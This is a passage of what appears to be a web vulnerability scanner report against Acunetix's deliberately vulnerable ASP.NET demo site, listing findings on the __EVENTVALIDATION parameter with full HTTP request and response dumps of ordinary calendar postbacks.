style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8501&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAibEfOtsIZGRkVRZcb7PWoL3lo2hxlMU%2B0F2mM8U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5zIJkAtOn6sAIArXOmMILAr%2BTx4wEAr%2BTx4wEAr%2BT%2B6MNAr%2BT%2B6MNAr%2BT78YGAr%2BT78YGAr%2BTw68DAr%2BTw68DAr%2BT98IMAr%2BT98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns%2FQwC19ns%2FQwC19mAkAQC19mAkAQC19n0%2BQIC19n0%2BQIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC%2Fw8CqOCC%2Fw8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB3z3OVps1G%2F0jpAXdhyCTnjlCgeC
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:55 GMT Content-Length: 12477
Response Body - size: 12,477 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAibEfOtsIZGRkVRZcb7PWoL3lo2hxlMU+0F2mM8U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5zIJkAtOn6sAIArXOmMILAr+Tx4wEAr+Tx4wEAr+T+6MNAr+T+6MNAr+T78YGAr+T78YGAr+Tw68DAr+Tw68DAr+T98IMAr+T98IMApC6wesPApC6wesPApC69Y4HApC69Y4HApC66SUCkLrpJQKQup34CQKQup34CQKQurGfAQKQurGfAQKQuqWyCgKQuqWyCgKQutnWAwKQutnWAwKQus3tDAKQus3tDAKQuqHVCQKQuqHVCQKQutXpAgKQutXpAgLX2ZSeBwLX2ZSeBwLX2Yg1AtfZiDUC19m8yAkC19m8yAkC19nQ7AIC19nQ7AIC19nEgwoC19nEgwoC19n4pgMC19n4pgMC19ns/QwC19ns/QwC19mAkAQC19mAkAQC19n0+QIC19n0+QIC19nonAoC19nonAoCqOD6hQ0CqOD6hQ0CqODu2AYCqODu2AYCqOCC/w8CqOCC/w8CqOC2kgcCqOC2kgcCqOCqKQKo4KopAqjg3s0JAqjg3s0JAqjg8uACAqjg8uACAqjg5ocKAqjg5ocKAqjg2uwIAqjg2uwIAqjgzgMCqODOAwKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXB3z3OVps1G/0jpAXdhyCTnjlCgeC" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:White" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8411&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAW8hm89oIZGRklO6UDtedbF%2FlJRfygIRRvR2clOw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5zMSZAwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX9mbBj2GSovbqhaAisX3pDdFF5TA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:44 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAW8hm89oIZGRklO6UDtedbF/lJRfygIRRvR2clOw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5zMSZAwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX9mbBj2GSovbqhaAisX3pDdFF5TA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:White" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a 